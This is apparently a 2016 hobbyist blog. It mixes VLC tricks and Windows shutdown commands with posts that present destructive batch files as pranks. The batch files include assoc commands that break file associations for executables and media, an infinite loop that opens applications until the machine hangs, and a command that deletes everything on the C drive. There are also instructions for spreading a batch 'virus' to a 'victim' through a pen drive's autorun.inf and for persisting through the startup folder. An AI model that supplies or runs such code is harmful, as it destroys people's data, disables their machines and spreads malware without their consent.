
Wednesday, 14 December 2016

Cool tricks for VLC users

VLC player, the most commonly used media player, that supports a wide range of file formats. But [ there is always a but :) ]
This is not just a media player, but it has a lot more hidden features that you can never imagine or never bothered to navigate. This player is very easy to use & also provides a user friendly interface.

So, its time to surprise you with the hidden secrets.

1. Inception mode

This mode is a built-in feature of VLC player, i.e it takes continous screenshots of your screen & keeps on taking in relatively smaller size. The screen will look like something going so deep. and eventually you will feel an inception. :)

How to do this?
a. Open VLC player.
b. Press "ctrl+n"
c. Type in "screen://" in the text box in front.
d. Click the play button.

2. Play Video as ASCII output.

Not any other media player has this capability but VLC does. :) 
This can give you an video playback in ASCII view. Below are the steps to perform this fun stuff:

a. Got to preferences under tools menu.
b. Click on Video.
c. Choose "output" as choose Color ASCII Art Video Output.
d. Play any video & have an ASCII output. (not worth watchimg but for fun sake).

3. Video running on Desktop

Ever heard of this? Yes, you can play any video on your desktop window. This is a great feature of VLC where you can run any video on your desktop, it might be distracting for you but this is an additional add-on in VLC media player.

Below are the steps:

a. Navigate to tools >> preferences.
b. Choose video from left menu, & on the output field choose: 'DirectX video output'
c. Save it.
d. Restart your VLC player.
e. Right click on screen & navigate to your required video> DirectX Wallpaper.

and that's it, video will run on your desktop, enjoy watching it on your desktop itself.

Monday, 12 December 2016

Extension Changer Virus

Guys, have you even imagined that if you can change the extensions of all the files in one go?

Yes, this is possible. :)

You can change the extensions of the existing files & make them useless.

For example you have a set of .txt files (say ~1000 files), you can change its extension in one go to anything & this would make the file useless (until the user knows). 

You can use this as a prank or fun moments or to trouble your friends. :)

Here we go:

As usual, open the notepad, paste the code & save it as a batch (.bat) file.


@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything


Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

Monday, 5 December 2016

Fork Bomb

Guys, what do you understand by a Fork Bomb?  

Most of you must be aware of this, but today I am going to show you a smallest virus that can can act like a grenade.

Believe me, you are gonna love this virus. It basically consumes all the CPU resources & make it hanged.

This code creates a large number of processes very quickly in order to saturate the process table of windows. And it will just hang the windows. No solution other than reboot the windows.

& if this virus is present in startup folder, god saves you. :)

(if this is in startup, then also it can be prevented, I will show you that in another article)

So here is the code:
Tiny but most powerful:


Just copy these 5 characters in a notepad & save it as .bat file. run this & be amazed of it. :)

If you want to see some other viruses as well then just click the below link:

Keep visiting to have more fun stuff.

Application Bomber

Hey guys, Hope all you are doing well.
Here is another virus that will eventually eats up all the CPU memory & will hang your computer. :)

Once you trigger this virus, it will flood the instances of listed applications in the virus code, You can add/remove more applications as per your requirement in the same syntax.

So Here is the code: :)
Copy & paste the code in a notepad, &  save it with a name <filename>.bat

@echo off    // It basically instructs to hide the commands when batch files is executed
:x   //loop variable
startmspaint  //open paint
start notepad
start write
startcmd //open command prompt
start explorer
start control
startcalc // open calculator
goto x // infinite loop

This code once executed will start opening different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting the performance. & eventually your system will be hanged forever until you restart. 

(or if you put this piece of code in startup folder, simple restart also won't work here)
So play around with these small viruses, & keep visiting here with more fun stuff.

Virus for Fun

Hi Mates,
I am back again with a deadly virus that can cause your laptop/computer to install an OS again from scratch. This virus can be even more deadly if you are having your stuff in your "C" drive. 

So the first thing to understand is, never put your important things in "c" drive. :D

Ok, let's start with VIRUS now. :)

save your computer

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as 
virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will 
delete all the content of C Drive.

Creating and Spreading virus from a Pen-drive

Hi Guys,
You must be interested in creating a self executable virus.

Sound interesting? :)
Well, then you are at a right place. I am gonna show you how to spread virus from a pen drive.

Everybody is having a pen drive these days, so its easy to play around with this small virus trick.

---------So here we go---------

Step 1

Open your notepad and write:


Now save this file as ‘autorun.inf’

Step 2

Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Now it depends on you what you want to put inside your batch file. :) 

[Note: This post is only for educational purpose, try this at your own risk]

Shutdown computer from command

A quick way to shutdown or restart your computer or to schedule a computer shutdown in some time without any external software. Most of you are using a software to schedule a system reboot or shutdown. 
But a geek never relies on any software. Right? :)

Here we go:
Just open your command prompt & play around. :)

1. For Shut Down

shutdown -s

2. For Restarting computer

shutdown -r

3. To Log-off

shutdown -l

-s, -r, -l parameters tells your computer to perform which action from above.


Now what if you want to shutdown your computer at a specified time. No worries :)
we have another trick to do so:

Scheduled Shutdown:

shutdown -s -t 120

That's all for today. Stay tuned for more. :)
Good day guys...